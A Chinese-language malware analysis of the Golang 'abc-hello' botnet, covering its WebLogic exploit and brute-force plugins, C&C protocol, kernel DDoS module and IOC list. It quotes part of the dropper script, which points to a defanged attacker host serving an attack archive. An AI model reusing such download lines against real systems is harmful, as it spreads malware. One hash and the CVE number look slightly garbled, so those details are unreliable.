abc-hello僵尸網絡在行動
責編:gltian |2021-12-07 14:46:40Lacework Labs 12月初在蜜罐中觀察到一個使用 Golang 編寫的暴力破解程序,分析確認該組件是?abc-hello?僵尸網絡開發,該僵尸網絡還利用 Weblogic 漏洞和其他模塊來爆破 SSH、Redis、PostgreSQL。
背景
近年來,Golang 惡意軟件的使用量顯著增長,在云上的攻擊尤為明顯。Golang 在惡意軟件中越來越普及,一方面是因為 Golang 在跨平臺編譯上的優勢,檢出率相對較低,另一方面是 Golang 在網絡任務上的性能強勁。
通過對蜜罐數據的分析,abc-hello?是近四個月內大部分 WebLogic 漏洞攻擊的罪魁禍首。其中,大量攻擊流量位于中國,這可能說明僵尸網絡在位于中國的云服務器上取得了巨大的成功。
傳播
通過靜態分析,發現惡意軟件的路徑中都包含?abc-hello,且開發了很多掃描、爆破的插件。例如,插件?plugin.Weblogic14882Check?就是 CVE-2021-14882 的 Exploit。
abc-hello/plugin.SetConfig
abc-hello/plugin.Scan
abc-hello/plugin.try
abc-hello/plugin.pluginRun.func2
abc-hello/plugin/plugin.go
abc-hello/plugin.Regist
abc-hello/ plugin.SshPassCheck
abc-hello/plugin.try.func1
abc-hello/plugin.PostgresPassCheck
abc-hello/plugin.pluginRun
abc-hello/plugin.RedisPassCheck
abc-hello/plugin.Check
abc-hello/plugin.CheckErrs
abc-hello /plugin.StartScan
abc-hello/plugin.pluginRun.func1
abc-hello/plugin.Weblogic14882Check
abc-hello/plugin.init.0
abc-hello/plugin.StartScan.func1
abc-hello?僵尸網絡主要通過暴力破解和漏洞利用進行傳播。
第一階段的惡意軟件是一個名為?ff.sh?的惡意 bash 腳本,下載其他惡意組件(如 XMRig 挖礦進程)。腳本會安裝?abc-hello?惡意軟件、配置名為?logger?的用戶并復制 SSH 密鑰。腳本中注釋包含?cloudResetPwdUpdateAgent,是 Huwaii 云計算為 OpenStack 架構提供的密碼重置工具。
ff.sh?將?abc-hello?寫入?/etc/iptablesupdate,還會以?/usr/bin/dockerlogger?的形式運行自身的副本。
dockerlogger相關的IP地址
流量分析
通過對 16 分鐘的?abc-hello?流量分析,十六分鐘內惡意軟件嘗試連接超過 7.4 萬個 IP 地址,共計 423MB。
惡意軟件首先通過 26800 端口連接到 C&C 服務器,以明文傳輸受害者的相關上線信息。
上線流量
每五秒發送一次到?/api/getlist?的 POST 請求,C&C 響應兩段十六進制 ASCII 值。第一段十六進制 ASCII 值(73746f707c)是?stop,第二段是用于驗證的數字簽名。
POST請求與響應
首先掃描的是失陷主機所在的 B 類子網,程序隨后會隨機生成公網的 B 類地址(255.255.0.0)再掃描整個子網。在連接的 7.4 萬 IP 地址中,2354 臺主機在目標端口有服務。
端口與相關服務
C&C 通信流量
內核模塊
abc-hello?的一個變種還帶有掃描和 DDoS 功能的內核模塊,模塊復用了?kdeb的開源代碼。該開源存儲庫只有兩個分支,傳播量可能并不大。自從 2013 年來,項目創建者 millken 一直都很活躍,開發了 140 余個項目,但基本都沒有描述文檔。
millken 編寫的代碼中 10% 是 Golang 編寫的,但暫不清楚其中是否和?abc-hello?的源碼有關。該用戶也寫過一個名為?kscan?的掃描程序,還從他人處 fork 了許多和攻擊相關的項目庫。kscan 庫包含一個配置文件,其中包含三個屬于 ASN 37963(杭州某公司)的 IP 地址,這也是在蜜罐中觀察到的攻擊流量的主要來源。
#!/bin/sh
xl_x64scan1=”http://103[.]209.103.16:26800/atk.tar.gz”
xl_x64scan2=”http://103[.]209.103.16:26800/atk.tar.gz”
if [ -x “$(command -v apt-get)” ]; then
export DEBIAN_FRONTEND=noninteractive
apt-get install -y debconf-doc
apt-get install -y build-essential
apt-get install -y make gcc git
fi
根據 Netlab 的跟蹤分析,該 DDoS 模塊后續被棄用。盡管還需要更多證據才能將 millken 用戶和?abc-hello?僵尸網絡的運營關聯起來,但相關的代碼庫仍然值得注意。
結論
盡管?abc-hello?僵尸網絡并不是影響力最大的僵尸網絡,但在蜜罐中持續能觀察到相關的攻擊流量,這說明該僵尸網絡的攻擊性仍然很強。此外,惡意軟件也在不斷進化與發展,根據研究人員分析攻擊者可能在嘗試使用 DGA 和 TOR 來作為 C&C 通信。Golang 已經成為許多暴力破解程序的首選,并且被很多僵尸網絡廣泛使用。
IOC
4bacbb6a20958b20a0f806b051ae6f6c84ff64fb3da98fb74a143517469bd162
ee06514351644d1a7b5568a6ba202e0451148df3f20e4367ea94625ebcfd3226
6473ead2efbbe010040f42ef1395c06c9deb7405ca89617d2318a419f90de4cc
f7dc1998c6ea802a9db30a1dfd777e00de09f498ad1266b46ae16c301e4e0f63
56d677ed192b-5010aa780d09c23b8ee8fdff94d39b20a07c7de76705e5f8c51f
f36d3996245dba06af770d1faf3bc0615e1124fa179ecf2429162abd9df8bbf8
6b900ff5ffd3ac1e8bc1fe7f921724f3e7f5dacca1dad98996011f70093b1a84
22b521f8d605635e1082f3f33a993979c37470fe2980956064aa4917ea1b28d5
fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474
3bf2c3f1ed9ad7edcb60802533878b5d74951f48c01b73775224c5d159d631bf
b7fd3d0188966d606fdb24cb3ec471b9c7424799dbba09506bea923cf2bd2e2e
103.209.103.16
39.105.1.75
101.34.114.216
120.234.32.22
18.163.28.194
124.128.200.114
47.93.11.177
39.101.174.25
106.13.18.221
47.97.5.115
參考來源
本文作者:Avenger,?轉載請注明來自FreeBuf.COM